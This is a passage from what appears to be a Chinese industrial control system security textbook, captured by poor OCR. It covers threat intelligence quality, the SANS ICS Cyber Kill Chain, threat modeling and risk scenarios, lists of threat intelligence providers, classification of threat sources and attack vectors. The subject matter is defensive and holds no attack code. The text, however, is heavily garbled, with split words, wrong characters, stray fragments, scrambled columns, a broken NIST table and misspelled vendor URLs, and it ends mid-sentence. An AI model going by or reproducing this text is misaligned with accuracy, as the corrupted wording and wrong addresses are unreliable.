事实 上 ， 当 以 上 述 方式 应 用 威胁 情报 时 ， 简 单 的 外 部 威胁 信息 也 可 用 于 生产 具有 可 操作 性 的 威胁 情报 。 无 论 威胁 情报 应 用 于 网 络 安全 项 目 中 的 哪个 阶段 ， 其 成 功 
运用 的 关键 取决 于 以 下 几 个 重要 因素 : 


` 信息 及 其 来 源 的 质量 
如 果 信 息 以 及 信息 的 来 源 不 可 靠 (应 当 是 经 过 验证 的 可 靠 来 源 ， 而 非 新 闻 报 道 ) ， 那 么 就 无 法 确定 其 能 否 提 供 有 价值 的 信息 。 
AEE 
言 息 量 太 小 可 能 难以 得 到 结果 ， 而 信息 量 过 大 又 可 能 导致 由 于 没有 足够 的 资源 而 提高 分 析 难 度 。 
` 同 机 构 、 系 统 及 环境 的 相关 性 


显然 ， 如 果 收 集 的 信息 与 用 户 无 关 ， 那 么 这 些 信息 没有 任何 价值 。 例 如 ， 如 果 威 胁 情 报 服务 提供 商 向 用 户 提供 有 关 Siemens S7PLC 设 备 的 报告 ， 但 其 实用 户 
并 没有 3S7PLC 设 备 ， 那 么 该 信息 惑 不 会 对 用 户 有 所 帮助 。 这 看 起 来 可 能 显而易见 ， 但 是 这 种 情况 的 确 人 存在。 


` 收集、 解析 和 分 析 信 息 的 能 


获取 威胁 情报 信息 并 将 其 转化 为 有 用 并 且 具 备 可 操作 性 的 内 容 ， 要 求 工 作 人 员 必 须 具 备 相 应 的 技术 水 平 ， 能 够 熟练 运用 有 关 工 具 并 且 能 够 付出 大 量 的 时 间 ， 
或 者 具备 将 收集 和 分 析 服 务 外 包 的 经 济 实力 。 (这 又 回 到 之 前 提 到 的 Mr.Lee 在 DFIR 中 发 表 的 那 篇 文章 了 ， 即 除非 具备 能 够 采用 对 于 用 户 具 有 现实 意义 的 方式 对 信 
息 进行 处 理 与 分 析 的 能 力 ， 否 则 信息 可 能 就 之 无 用 处 。) 


` 信息 的 应 用 方式 


正 像 前 面 已 经 指出 的 那样 ， 除 非 信 息 具 有 可 操 行 性 ， 否 则 信息 是 没有 价值 的 。 例 如 ， 如 果 可 以 利用 信息 以 及 (或 者 ) 分 析 得 到 的 威胁 情报 使 防御 策略 更 加 有 
效 、 更 具 成 本 效益 ， 那 么 这 些 信息 就 是 有 价值 的 。 如 果 信 息 能 够 帮助 抵御 迫在眉睫 的 威胁 ， 那 么 这 些 信息 束 具 有 重要 的 价值 。 而 如 果 只 是 “ 举 拥 信息 而 以 防 万 


一 ”， 那 么 信息 的 价值 显然 很 低 ,或 者 根本 就 是 浪费 钱 。 


那么 ， 如 何 有 效 地 收集 工控 系统 威胁 情报 ， 以 及 如 何 使 其 对 于 用 户 的 工控 系统 环境 具有 现实 意义 呢 ? 


3.2 威胁 建 模 : 将 工控 系统 威胁 信息 转化 为 “可 操作 ”的 威胁 情报 


收集 所 有 这 些 信息 并 建立 其 与 我 们 在 第 2 章 中 提 到 的 可 行 风险 场景 (risk scenarios， 也 称 为 攻击 场景 和 攻击 树 ) 之 间 关 联 的 过 程 通常 称 之 为 威胁 建 模 。 (可 
能 还 会 有 “杀伤 链 ” 或 “O.O.D.A 回 路 ”的 提 法 ， 可 以 去 Google 上 搜索 一 下 ， 源 于 军事 和 情报 领域 听 起 来 颇 为 官方 的 术语 也 在 不 断 成 为 流行 词汇 。 也 就 是 说 ， 最 
近 流 行 的 “杀伤 链 ”[“ 工 控 系 统 杀伤 链 ” 将 在 后 面 讨论 ] 一 词 ， 不 仪 可 以 针对 于 工控 系统 ， 而 且 也 确实 说 到 了 点 子 上 。) 最 后 ， 无 论 使 用 哪个 术语 ， 其 作用 都 是 试 
图 对 威胁 最 有 可 能 会 针对 和 打击 的 目标 做 出 预测 。 确 保 威胁 建 模 过 程 具 有 现实 意义 ， 并 且 准 确 性 更 高 的 最 有 效 方法 之 一 是 将 其 与 风险 评估 或 分 析 (态势 感 类 ) 过 
程 结合 起 来 。 


G5 


安全 信息 和 事件 管理 (SIEM) 系统 实际 上 可 以 是 一 个 非常 强大 、 非 常 主动 的 威胁 建 模 工具 。 当 与 最 新 的 威胁 情报 以 及 危害 指标 源 (IoC) 相 结合 时 ， 可 以 对 
SIEM (及 其 IDS/IPS 组 件 ) 进行 配置 以 监视 不 断 涌现 的 新 兴 威 胁 ， 并 将 这 些 威胁 同 特定 环境 建立 关联 。 继 续 阅 读本 章 内 容 时 ， 请 记 住 这 一 点 ， 当 使 用 关联 数据 开 
始 构 建 可 行 的 风险 场景 时 ， 就 可 以 看 到 其 潜在 的 收益 。 


3.2.1 工控 系统 杀伤 链 


2015 年 10 月 ，SANS 研 究 所 发 布 了 由 Michael J.Assante 和 Robert M.Lee 撰 写 的 报告 《工控 系统 杀伤 链 》 (https://www.sans.org/reading- 
room/whitepapers/ICS/industrialcontrol-system-cyber-kill-chain-36297) 。 工 控 系 统 杀 伤 链 不 仅 能 够 准确 地 反映 在 工控 系统 恶意 代码 攻击 活动 中 (如 
Stuxnet 和 Havex) 所 展示 的 整套 方法 和 攻击 过 程 ， 还 强调 了 这 样 一 个 事实 一 重大 的 工控 系统 安全 事件 需要 对 目标 对 象 的 过 程 环 境 有 着 全 面 透彻 的 了 解 ， 这 些 特点 
使 得 工控 系统 杀伤 链 脱颖而出 。 


工控 系统 杀伤 链 的 另 一 个 重要 方面 体现 在 不 仅 可 以 表征 恶意 代码 攻击 活动 ， 而 且 适 用 于 所 有 工控 系统 网 络 威胁 或 网 络 攻击 。 
报告 的 作者 在 对 侦察 、 开 发 、 验 证 或 测试 阶段 的 描述 过 程 中 ， 以 及 对 “攻击 活动 ”中 的 心态 和 策略 的 强调 也 说 明了 这 一 点 。 换 句 话 说 ， 工 控 系 统 杀 伤 链 考 虑 


到 攻击 者 用 以 了 解 过 程 环境 、 实 施 针对 工控 系统 的 重大 攻击 ， 以 及 漏洞 利用 工具 部 署 之 前 对 漏洞 进行 测试 、 验 证 及 调试 的 方法 和 总 体 过 程 。 上 述 攻击 活动 的 区 分 
要 素 可 以 在 杀伤 链 中 的 第 2 阶段 中 找到 ， 如 图 3-1 所 示 。 


STAGE 2 
ILS Attack Development ond Execution 


; . LEE REE EEE EOS 
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Enabling Attack 


Initiating Attack Supporting Attack 


Stage 2 shows the steps associated with a material attack that requires high confidence. 


图 3-1 SANS 提 出 的 工控 系统 杀伤 链 第 2 阶段 


报告 的 作者 还 将 特别 涉及 工控 系统 (过程 画面 、 控 制 和 功能 安全 等 ) 所 可 能 导致 的 工控 系统 后 果 分 类 (BOHR. ARMA) 进行 了 分 解 画面 ， 如 图 3-2 
所 示 。 


攻击 者 的 目标 


“ 面 面 中 断 
- 控制 中 断 


拒绝 


* 拒 维 搂 收 画面 
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. 拒绝 接收 功能 安全 指令 
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图 3-2 SANS 提 出 的 工控 系统 杀伤 链 攻 击 者 目标 
Q 
读者 可 以 看 看 自己 是 否 能 确定 “Ptoph ”案例 研究 中 的 工控 系统 杀伤 链 步 又 〈 案 例 研究 2、3、4 和 5) 。 请 记 住 ， 工 控 系统 杀伤 链 并 不 总 是 一 个 完美 的 线性 过 


程 ， 在 整个 链条 完成 之 前 ， 不 止 一 个 步骤 可 能 会 需要 进行 多 次 重复 。 


在 本 章 讨论 威胁 建 模 过 程 的 同时 一 定 要 思考 工控 系统 杀伤 链 ， 因 为 它 可 以 帮助 读者 了 解 高 水 平 的 工控 系统 攻击 者 ， 并 显著 改善 风险 场景 的 正确 性 和 有 效 性 。 


这 在 实施 渗透 测试 时 尤其 重要 。 因 为 即使 开 友 漏洞 利用 工具 是 “渗透 测试 生命 周期 ” (或 “攻击 解析 ”) 中 涉及 技术 部 分 的 内 容 ， 然 而 由 于 时 间 限 制 ， 在 大 多 数 
渗透 测试 过 程 中 通常 不 会 包含 这 个 阶段 。 渗 透 测试 人 员 通 常 依赖 于 现 有 的 漏洞 利用 工具 ， 而 工控 系统 杀伤 链 则 可 以 帮助 读者 在 考虑 威胁 建 模 时 一 直 留 心 于 该 方面 


内 容 。 另 一 方面 ， 如 果 渗 透 测 试 过 程 中 的 时 间 相 当 充 裕 ， 那 么 就 可 以 采用 工控 系统 杀伤 链 作 为 重要 模型 ， 从 而 制订 出 最 符合 现实 状况 的 测试 策略 。 
对 工控 系统 杀伤 链 进 行 深 入 讨论 超出 了 本 章 范 围 ， 但 如 果 读 者 正在 进行 工控 系统 威胁 建 模 ， 那 么 我 们 强烈 建议 读者 从 SANS 网 站 把 前 面 提 到 的 文章 下 载 下 来 以 
便于 学 习 。 


©)... 
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在 工控 系统 杀伤 链 公 开发 布 之 前 ，“Proph” 案 例 研 究 中 所 用 到 的 大 多 数 方法 实际 上 都 是 现实 中 真实 用 户 记 录 下 来 的 方法 。 但 是 ， 工 控 系 统 杀 伤 链 可 以 用 于 对 
Proph 用 到 的 每 种 方法 以 及 总 体 策略 进行 准确 解析 ， 并 为 其 对 工控 系统 威胁 的 有 效 性 与 适用 性 提供 进一步 的 证 据 支 持 。 


3.2.2 ”工控 系统 威胁 建 模 过 程 


从 这 里 开始 ， 所 有 内 容 都 是 天 于 使 用 威胁 情报 以 及 用 户 上 自身 的 态势 感知 来 构建 可 行 工 控 系 统 风 险 场景 的 ， 并 且 该 工控 系统 风险 场景 特定 于 用 户 机 构 或 者 系 
统 。 而 构建 这 些 风 险 场景 则 需要 深刻 了 解 攻击 方法 和 技术 以 及 正在 评估 的 工控 系统 环境 。 因 此 ， 与 工控 系统 资产 所 有 者 和 (或 ) 托管 方 进行 协调 对 于 本 步骤 的 实 
施 绝对 必要 。 运 营 人 员 几 乎 忌 是 比 网 络 安全 人 员 更 为 了 解 资 产 、 系 统 以 及 过 程 。 而 男 一 方面 ， 对 于 运营 人 员 而 言 ， 从 “攻击 者 角度 思考 问题 ”以 及 对 攻击 场景 的 
概念 加 以 界定 是 一 项 非常 困难 的 工作 ， 这 可 能 是 因为 他 们 缺乏 友 起 攻击 活动 的 技术 储备 。 


Ons 

虽然 在 工控 系统 环境 中 实际 开展 渗透 测试 并 不 总 是 推荐 的 ， 或 者 说 不 总 是 可 行 的， 但 这 一 过 程 说 明了 特定 于 工控 系统 的 渗透 测试 经 验 和 知识 仍然 至 关 重 要 。 
我 们 从 风险 的 初始 定义 (第 2 章 中 讨论 过 ) 开始 讨论 工控 系统 的 威胁 建 模 ， 因 为 这 一 过 程 中 包含 了 一 个 完整 风险 场景 中 所 涉及 的 所 有 要 素 ， 风 险 即 : 

由 于 目标 对 象 中 所 存在 的 潜在 脆弱 性 ， 威 胁 源 将 通过 威胁 向 量 而 导致 威胁 事件 友 生 的 可 能 性 ， 以 及 由 此 而 产生 的 后 果 和 影响 。 


上 述 风险 定义 的 表述 不 仅 可 以 作为 收集 所 需 信息 的 指南 ， 也 为 我 们 提供 了 一 个 威胁 建 模 和 风险 场景 的 模板 。 场 景 的 核心 是 威胁 事件 (攻击 或 安全 事件 ) 。 对 
于 一 个 可 行 的 威胁 事件 而 言 ， 必 须 包 含 以 下 四 个 要 素 : 


` 发 起 事件 的 威胁 源 
< 对 脆弱 性 加 以 利用 的 威胁 向 量 
- 存在 脆弱 性 的 目标 对 象 


一 旦 确定 并 了 解 了 潜在 威胁 源 、 脆 弱 性 以 及 针对 脆弱 性 的 威胁 向 量 ， 融 可 以 得 到 构成 一 次 可 行 的 威胁 事件 所 需要 的 全 部 内 容 ， 如 图 3-3 所 示 。 


目标 对 象 


图 3-3 ”威胁 要 素 及 其 与 威胁 事件 的 关系 


然后 ， 将 构建 的 威胁 事件 映射 到 相关 后 果 (在 风险 评估 过 程 中 确定 ) 之 上 ， 并 与 业务 目标 (在 风险 评估 过 程 中 建立 ) 进行 比较 ， 从 而 完成 风险 场景 的 构建 。 


此 过 程 如 图 3-4 所 示 。 


图 3-4 ”风险 场景 模型 


从 每 种 风险 场景 中 都 可 以 得 到 特定 的 可 操作 情报 。 例 如 ， 用 户 不 仅 知 道 漏洞 在 哪里 ， 而 且 知 道 哪些 威胁 源 对 这 些 漏洞 感 兴趣 并 且 能 够 对 其 加 以 利用 ， 以 及 可 
能 导致 漏洞 利用 的 威胁 向 量 。 仪 仪 上 述 信息 惑 已 经 可 以 帮助 用 户 首 移 聚 焦 于 修复 与 完整 风险 场景 相关 联 的 漏洞 ， 从 而 足以 提高 缓解 措施 的 效果 了 。 而 且 ， 如 果 在 


威胁 源 与 可 能 导致 严重 后 果 的 漏洞 之 间 不 存在 完整 路 径 ， 那 么 也 可 以 认为 该 漏洞 目前 其 实 并 没有 什么 风险 。 这 一 结论 的 得 出 也 取决 于 所 获得 信息 的 质量 以 及 对 信 
息 分 析 的 质量 。 


Q. 


威胁 建 模 过 程 中 所 涉及 的 整体 分 析 可 能 变 得 复杂 而 兄长 ， 因 为 相关 联 的 风险 要 素 之 间 不 必 存 在 一 对 一 的 关系 。 例 如 ， 你 很 可 能 会 发 现存 在 几 个 漏洞 ， 几 个 潜 


在 威胁 源 ， 还 有 不 只 一 个 对 这 些 漏 洞 进行 利用 的 攻击 向 量 。 从 而 很 可 能 得 到 多 种 组 合 形式 ， 并 最 终 造 成 一 个 甚至 多 个 后 果 。 这 就 是 为 什么 风险 场景 通常 采取 “ 攻 
击 树 ” 和 (或) “风险 矩阵 ”的 形式 ， 而 非 单一 线性 场景 形式 的 原因 。 这 一 概念 和 过 程 的 细节 将 在 本 章 后 面 讨论 。 


风险 评估 过 程 最 后 阶段 的 风险 验证 和 风险 计算 步骤 完成 之 后 ， 可 以 进一步 提高 这 些 信息 的 可 操作 性 和 质量 。 我 们 将 会 在 本 章 后 面 介 绍 风险 验证 (risk 
validation) 和 风险 计算 (risk calculation) 过 程 ， 并 在 第 10 章 中 对 此 作 进 一 步 的 讨论 。 图 3-5 说 明了 这 些 步骤 是 如 何 融 入 进 风 险 建 模 过 程 的 。 


图 3-5 风险 计算 模型 


每 个 风险 场景 都 应 当 进 行 验证 与 (或 ) 量化 评分 ， 以 确定 该 场景 实际 发 生 的 可 能 性 。 这 一 过 程 通常 采用 渗透 测试 (进一步 证 明 渗 透 测试 适合 于 整体 评估 ) ， 
或 者 使 用 诸如 通用 漏洞 评分 系统 (CVSS) (https://nvd.nist.gov/CVSS-v2-Calculator) 之 类 的 “量化 ”评分 工具 来 完成 ， 因 为 无 论 是 渗透 测试 还 是 “量化 ” 评 
分 工具 都 考虑 到 了 外 部 的 动态 因素 。 场 景 最 终 的 风险 评级 是 通过 分 析 其 可 能 性 得 分 及 其 影响 评分 来 计算 的 (我们 将 在 本 章 后 面 及 第 10 章 对 所 涉及 的 计算 过 程 做 进 


一 步 详细 讨论 ) 。 


最 终结 果 是 ， 用 户 并 不 需要 维护 一 个 完全 由 松散 关联 的 威胁 情报 信息 所 构成 的 数据 库 ， 束 可 以 拥有 对 其 系统 具有 现实 意义 并 经 过 验证 的 、 全 面 的 、 可 操作 的 
威胁 情报 。 这 一 层面 上 的 信息 将 使 得 用 户 能 够 更 有 效 地 对 风险 缓解 策略 的 优先 级 进行 排序 。 


3.2.3 ”信息 收集 


为 了 保证 威胁 建 模 和 风险 评估 过 程 能 够 提供 有 效 的 结果 ， 需 要 收集 适当 的 信息 并 对 其 进行 正确 分 析 。 本 节 将 介绍 如 何 将 信息 收集 方法 应 用 到 特定 于 工控 系统 
的 风险 评估 过 程 。 


1. 外 部 威胁 情报 源 


过 程 要 求 将 内 部 信息 和 外 部 信息 结合 起 来 。 内 部 信息 显然 特定 于 信息 所 处 的 环境 。 因 此 ， 内 部 信息 收集 方法 (资产 识别 、 脆 弱 性 评估 等 ) 已 经 为 工控 界 
eC eee 
界定 的 范围 相 比 ， 外 部 信息 的 收集 范围 要 大 得 多 ， 甚 至 是 全 球 分 布 的 。 因 此 ， 通 常 需 要 付出 很 大 的 努力 来 收集 这 些 信息 并 进行 分 析 ， 进 而 才能 从 中 提取 出 具有 现 
实意 义 、 可 应 用 的 情报 。 


相 比 于 耗费 用 户 自 己 的 内 部 资源 来 完成 这 些 任务 ， 也 可 以 选择 第 三 方 提 供 的 威胁 情报 。 这 些 服 务 涵 芋 了 从 面向 行业 与 (或) 面向 系统 级 别 的 信息 ， 再 到 针对 
客户 的 信息 等 诸多 层次 ， 尽 管 针 对 性 更 强 的 情报 其 售 价 往往 也 更 高 。 下 面 是 外 部 威胁 情报 资源 和 服务 的 部 分 实例 (但 不 限于 本 文 所 列 出 的 资源 ) : 


- ICS-CERT (https://ics-cert.us-cert.gov/) 美国 国土 安全 部 的 ICS-CERT 网 站 长 期 以 来 一 直 被 视 为 工控 系统 威胁 情报 的 权威 信息 来 源 ， 它 所 提供 的 内 容 包 括 
漏洞 公告 、 季 度 报 告 ， 以 及 可 作为 公共 资源 访问 的 内 容 ， 还 包括 只 有 经 过 审查 的 特定 用 户 才能 够 访问 的 内 容 。 


* Critical Intelligence (http://www.ctitical-intelligence.com/) 该 公司 最 近 被 iSight Partners 公 司 收购 (而 iSight Partners 4] X A] A) #FireEye A 4) KIA) , Critical 
Intelligence 是 第 一 家 提供 针对 工控 系统 的 威胁 情报 的 商业 公司 。 


信息 共享 与 分 析 中 心 (Information Sharing and Analysis Centers, ISAC) ”通常 ， 针 对 特定 部 门 (例如 EE-ISAC、ONG-ISAC、ICS-ISAC 等 ) 的 信息 共享 中 心 可 
以 作为 ICS-CERT 的 替代 或 扩充 ， 并 且 同 个 性 化 的 商业 服务 相 比 具有 更 高 的 成 本 效益 。 然 而 ， 这 些 共 享 中 心 的 价值 高 度 依赖 于 其 成 员 的 积极 参与 。 而 中 心 的 成 员 之 
间 缺 乏 分 享 他 们 各 自 所 遇 到 安全 事件 的 动力 ， 所 以 通常 是 由 信息 共享 中 心 来 寻找 获取 更 多 信息 ， 而 非 成 员 主动 提供 信息 。 尽 管 如 此 ， 只 要 成 员 之 间 能 够 达成 共识 


并 对 共享 状况 做 出 改善 ， 信 息 共 享 与 分 析 中 心 的 前 景 还 是 非常 美好 的 〈 就 像 金 融 部 门 在 FS-ISAC 所 开展 的 工作 一 样 ) 。 


- Infragard (https://www.infragard.org/) 该 网 站 是 联邦 调查 局 和 商业 公司 的 合作 伙伴 。 网 站 中 还 包括 一 个 对 用 户 身 份 进行 严格 审查 的 保密 论坛 ， 这 是 因为 威 
胁 情报 的 内 容 非 常 敏 感 ， 因 此 不 宜 向 公众 公开 。 


- SCADAHacker.com (https://www.scadahacket.com) 该 网 站 虽然 不 直接 提供 威胁 情报 服务 ， 但 却 是 一 个 相当 全 面 的 针对 工控 系统 安全 的 资源 库 ， 由 Joel 
Langill 创 建 。 在 本 文 撰写 阶段 ， 该 网 站 维护 良好 ， 对 关于 最 新 工控 系统 漏洞 、 威 胁 等 内 容 的 信息 一 直 保 持 着 更 新 。 


- Recorded Future (https://www.recordedfuture.com/ics-scada/) ”该 网 站 使 用 多 种 威胁 情报 平台 提供 威胁 情报 服务 ， 其 中 许多 平台 都 是 由 威胁 情报 服务 公司 所 
FAM. Recorded Future 公 司 致 力 于 为 其 他 威胁 情报 平台 和 服务 公司 提供 基础 服务 ， 这 也 是 其 与 别 的 威胁 情报 厂商 不 同 的 地 方 。 当 前 ，Recorded Future 公 司 也 正在 
大 举 进 入 工控 系统 市 场 。 


- 其 他 能 够 提供 安全 分 析 、 恶 意 代码 分 析 以 及 威胁 情报 服务 的 工控 系统 网 络 安全 公司 、 厂 商 还 包括 : 
- Cylance (https://www.cylance.com) 

- Red Tiger Security (http://redtigersecutity.com) 

- Kenexis (https://www.kenexis.com) 

- Lofty Perch (https://www.loftyperch.com) 

- Langer Group (http://www.langnet.com) 

- Dragos Security (https://www.dragossecurity.com) 

- CyberX (http://cyberx-labs.com) 

- NexDefense (http://www.nexdefense.com) 

- Red Trident Security (http://www.tedtridentinc.com) 


- 其 他 商业 威胁 情报 服务 ”一段 时 间 以 来 ， 在 商业 IT 市 场 涌现 出 了 大 批 威胁 情报 服务 提供 商 。 其 中 的 大 多 数 公 司 都 已 经 开始 提供 不 同 程度 的 工控 系统 威胁 情 
报 服务 ， 但 是 其 专业 水 平 也 有 所 区 别 。 这 些 威胁 情报 服务 提供 商 包括 : 


Booz Allen Hamilton Cyber4Sight 


- CrowdStrike 


- TOActive 


- Verisign iDefense 


- Looking Glass/Cyveillance 
- Symantec DeepSight 


- Cisco Talos 
- Dell SecureWorks 


- McAfee Global Threat Intelligence 


- IBM X-Force 
- Trend Micro 


- Kaspersky Labs 
- Risk Based Security 
能 只 有 少量 的 威胁 源 尝试 对 小 型 石油 天 


2. 威 胁 评 估 : 识别 工控 系统 威胁 源 或 威胁 发 起 方 
如 前 所 述 ， 威 胁 源 是 一 个 完整 威胁 事件 所 必 备 的 要 素 之 一 。 本 步骤 叶 在 对 潜在 威胁 源 及 其 动机 、 手 段 和 能 力 进行 识别 和 分 析 。 针 对 某 一 用 户 的 威胁 源 类 型 数 


党 与 用 户 的 暴露 程度 成 正比 。 例 如 ， 一 家 从 事 上 游 业 务 的 小 型 石油 天 然 气 公司 同一 家 知名 的 大 型 能 源 公 司 相 比 ， 很 可 


公司 发 起 攻击 。 在 对 威胁 源 进 行 分 析 还 需要 考虑 的 一 些 问题 包括 : 
我 的 潜在 攻击 者 是 谁 ， 他 们 为 什么 要 攻击 我 ( 换 句 话说， 也 就 是 他 们 的 动机 是 什么 ) ? 


量 通 
气 
` es 
:如果 我 是 一 家 大 型 工控 系统 厂商 ， 那 么 多 黑客 对 我 发 起 攻击 只 是 为 了 图 刺激 寻找 我 产品 中 最 新 的 漏洞 吗 ? 


SK 


ANAN 


- 如 果 我 是 一 家 大 型 能 源 公司 ， 需 要 对 生产 系统 以 及 功能 安全 系统 予以 保护 ， 那 么 黑客 们 只 是 试图 得 改 我 的 网 站 吗 ? 
通过 回答 上 述 问题 ， 能 够 为 指出 评估 和 缓解 策略 首先 应 聚焦 于 哪些 地 方 提供 线索 。 殊 潜在 攻击 者 的 手段 和 能 力 而 言 ， 也 将 在 对 抗 这 些 威胁 所 需要 付出 的 努力 
待 


程度 和 财务 支持 水 平 的 过 程 中 发 挥 重 要 作用 。 攻 击 者 是 只 具有 入 门 水 平 ， 仪 会 拿 着 现成 工具 漫 无 目的 地 寻找 目标 的 “脚本 小 子 ”? 还 是 有 组 织 的 犯罪 集团 ? 抑或 

水 平 黑客 并 开发 高 级 恶意 代码 的 攻击 团队 ? 潜在 攻击 者 的 手段 与 能 力 各 不 相同 ， 因 此 需要 区 别 对 待 
考虑 外 部 威胁 源 ， 尤 其 是 在 网 络 安全 领域 更 是 如 此 。 在 整个 计算 机 系统 以 及 工业 控制 系统 的 历史 长 河中 ，“ 内 部 人 员 ” 往 往 会 构成 系统 
“内 部 威胁 ”是 最 难以 防御 的 。 虽 然 本 


E= 
ASS 


一 个 常见 的 错误 是 只 
=x 

ID 
OTF 


是 一 支 能 够 调动 各 种 资源 有 
整 性 方面 的 考虑 ， 也 需要 在 风险 评估 中 考虑 物理 和 自然 威胁 源 。 
而 不 是 仅仅 通过 对 每 种 可 能 的 威胁 源 进行 具体 描述 ， 然 后 汇总 得 至 


的 重大 威胁 ， 特 别 是 如 果 考 虑 到 一 般 用 户 、 工 程 师 或 操作 员 也 会 经 党 犯错， 那么 束 不 难 理解 这 种 情况 了 。 事 实 上 可 以 说 ， 


LNS 
分 类 ， 


书 将 重点 放 在 网 络 (cyber) 风险 上 ， 但 是 在 风险 评 佑 过程 中 出 于 


首先 ， 我 们 采用 最 基本 的 通用 分 类 方式 对 威胁 源 进行 
助 于 更 好 地 组 织 威胁 评估 ， 而 且 将 其 纳入 威胁 建 模 过 程 也 更 加 容易 。 图 3-6 更 好 地 说 明了 这 个 概念 


I 威胁 源 的 详细 列表 。 这 样 做 有 


内 部 威胁 源 外 部 威胁 源 


图 3-6 ”潜在 威胁 源 分 类 


从 远 辑 上 讲 ， 威 胁 源 只 能 是 内 部 的 或 者 外 部 的 ， 所 以 这 两 个 因素 是 图 中 分 类 方式 的 主要 沙 脚 点 。 从 内 部 的 角度 来 看 ， 威 胁 源 可 以 是 为 公司 工作 的 人 员 (A 
工 ) 或 者 授权 允许 进入 公司 的 人 员 (承包 商 或 第 三 方 ) ， 造 成 的 安全 事件 可 以 是 无 意 的 也 可 以 是 蓄意 的 。 从 外 部 角度 来 看 ， 事 件 可 以 是 随机 事件 ， 也 可 以 是 专门 
以 某 一 类 用 户 为 目标 的 威胁 源 所 导致 的 结果 。 其 中 ， 随 机 威胁 源 的 例子 包括 ， 无 意 中 间 进 公司 的 黑客 ， 已 经 传播 到 用 户 系 统 的 恶意 代码 ， 或 者 非 技术 类 的 威胁 
源 ， 例 如 由 上 自然 环境 (天气 、 地 震 等 ) 或 人 为 因素 (施工 事故 、 战 争 等 ) 导致 的 灾难 事故 。 而 专门 针对 某 一 类 用 户 的 威胁 源 则 可 以 分 为 具备 用 户 系统 专业 知识 的 
威胁 源 以 及 不 具备 用 户 系统 专业 知识 的 威胁 源 (可 能 是 一 群 黑 客 、 有 恶意 代码 、 恐 怖 分 子 、 有 组 织 犯罪 集团 和 由 政府 资助 的 团队 ) 。 最 后 ， 之 前 的 内 部 威胁 源 也 可 
以 成 为 专门 针对 某 一 用 户 的 外 部 威胁 (前 内 部 人 员 ) ， 并 且 由 于 其 拥有 人 在 机 构 内 部 的 工作 经 历 ， 因 此 具备 针对 特定 系统 的 专业 知识 。 


再 强调 一 下 ， 这 只 是 对 用 户 自 己 的 威胁 源 进行 评估 并 加 以 组 织 的 初始 框架 ,用户 当然 可 以 对 其 进行 修改 以 适应 实际 需求 。 还 可 以 对 内 部 威胁 源 继续 分 解 ， 
将 “有 特权 的 ”和 “无 特权 的 ”威胁 源 等 内 容 包 括 进 来 。 从 这 一 点 来 看 ， 用 户 还 需要 查找 外 部 信息 来 源 ， 例 如 上 一 节 中 所 讨论 的 信息 来 源 ， 以 便 根据 需要 在 各 个 
类 别 中 添加 更 多 适用 并 有 针对 性 的 详细 信息 。 举 个 例子 ， 既 然 提 到 了 外 部 威胁 源 类 别 ， 那 么 是 否 有 某 些 黑客 或 恐怖 组 织 以 读者 或 者 读者 所 使 用 的 系统 为 攻击 目标 
Ne? 


一 旦 缩小 了 适用 的 威胁 源 类 别 ， 融 可 以 根据 需要 获得 更 具体 的 信息 。《 工 业 控 制 系统 安全 指南 》 (NIST-SP800-82) 中 提出 了 一 个 相对 较为 全 面 的 威胁 列 
表 ， 如 表 3-1 所 示 ， 可 以 将 其 作为 基准 以 供 人 参考。 


表 3-1 源 自 NIST SP800-82 指 南 的 工控 系统 威胁 


威胁 源 类 别 特 征 
结构 类 
Q IT 设备 
2 存储 
2 处 理 
2 通信 
Q 显示 
由 于 老化 、 资 源 耗 疯 以 及 未 按 牟 
DD 环境 控制 是 的 运行 参数 工作 和 情况 所 导致 的 iii aie 
en 设备 、 环 境 控制 或 软件 的 故障 
) 温 湿度 控制 
2 电力 供应 
2 软件 
D 操作 系统 
2 网 络 
O 通用 应 用 程序 
2 专用 应 用 程序 
(ZÈ ) 
威胁 源 类 别 fi 述 特 t 
环 培 类 目 然 灾害 及 关键 基础 设施 故障 ， 
QD 目 然 或 人 为 灾害 其 中 机 构 依 赖 于 关键 基础 设施 ， 但 
火灾 是 关键 基础 设施 超出 了 机 构 的 控制 
口 洪水 /海啸 沁 围 
风灾 /龙卷风 注意 : 自然 灾害 和 人 为 灾害 也 可 
D 飓风 以 根据 其 严重 性 和 (或 ) 持续 时 间 
Q 地震 来 进行 刻画 。 然 而 ， 由 于 威胁 源 和 AORA 
D REO l 威胁 事件 的 辨识 度 较 高 ， 因 此 严重 
BOK YZ th 性 和 持续 时 间 可 以 包含 在 对 威胁 事 
SRR ESSE KARP | 件 的 描述 中 (例如 ，5 级 飓风 对 放 
J 基础 设施 故障 或 中 断 轩 关 键 任务 系统 的 设施 造成 了 严重 
mp 破坏 ， 导 致 这 些 系统 在 长 达 3 周 的 


时 间 里 无 法 使 用 ) 


3. 识 别 工控 系统 威胁 或 攻击 向 量 


黑客 会 在 所 有 能 够 访问 到 的 资产 中 寻找 入 口 点 ( 即 攻击 向 量 或 威胁 向 量 ) 。 因 此 ， 需 要 识别 出 所 有 的 攻击 面 和 通信 路 径 。 攻 击 面 (attack surface) 是 采用 某 
种 方式 发 现 的 任意 资产 或 信息 ， 而 这 些 资 产 或 信息 可 能 被 黑客 获取 、 使 用 或 攻击 。 它 们 可 能 是 面向 互联 网 的 系统 、 产 品 ， 甚 至 也 可 能 是 对 攻击 者 帮助 极 大 的 已 经 
披露 的 敏感 信息 (例如 ， 员 工 在 Facebook 上 发 表 的 内 容 ) 。 通 常 认 为 面向 互联 网 的 系统 和 产品 攻击 面 较 大 ， 而 隔离 环境 中 的 计算 机 (实验 室 中 的 计算 机 ) 攻击 面 


较 小 。 


威胁 向 量 (Threat vectors) 可 以 被 看 作 是 资产 接收 数据 以 及 与 外 界 通信 的 方法 。 最 终 决 定 了 黑客 将 采用 何 种 方式 尝试 发 起 针对 资产 的 攻击 。 威 胁 向 量 中 还 包 


括 通 信 路 径 ， 并 且 常 常 是 风险 评估 中 忽略 的 关键 点 。 例 如 ， 同 工控 系统 资产 相 比 ， 面 向 互联 网 的 企业 资产 尽管 可 能 具有 较 低 的 关键 性 评级 ， 但 其 自身 也 是 能 够 连 
妆 到 工控 系统 网 络 中 更 为 天 键 的 资产 的 一 条 通信 路 径 。 因 此 ， 黑 客 也 可 能 会 入 侵 评级 较 低 的 资产 ， 并 以 此 为 跳板 (使 用 该 系统 作为 访问 其 他 内 部 系统 的 通路 ) 进 
入 到 用 户 网 络 中 实现 对 更 关键 系统 的 访问 。 这 种 类 型 的 通信 路 径 的 存在 ， 几 乎 违背 了 所 有 工业 安全 标准 中 的 指南 ， 但 是 我 们 仍然 经 常 能 看 到 这 种 情况 。 这 就 是 为 


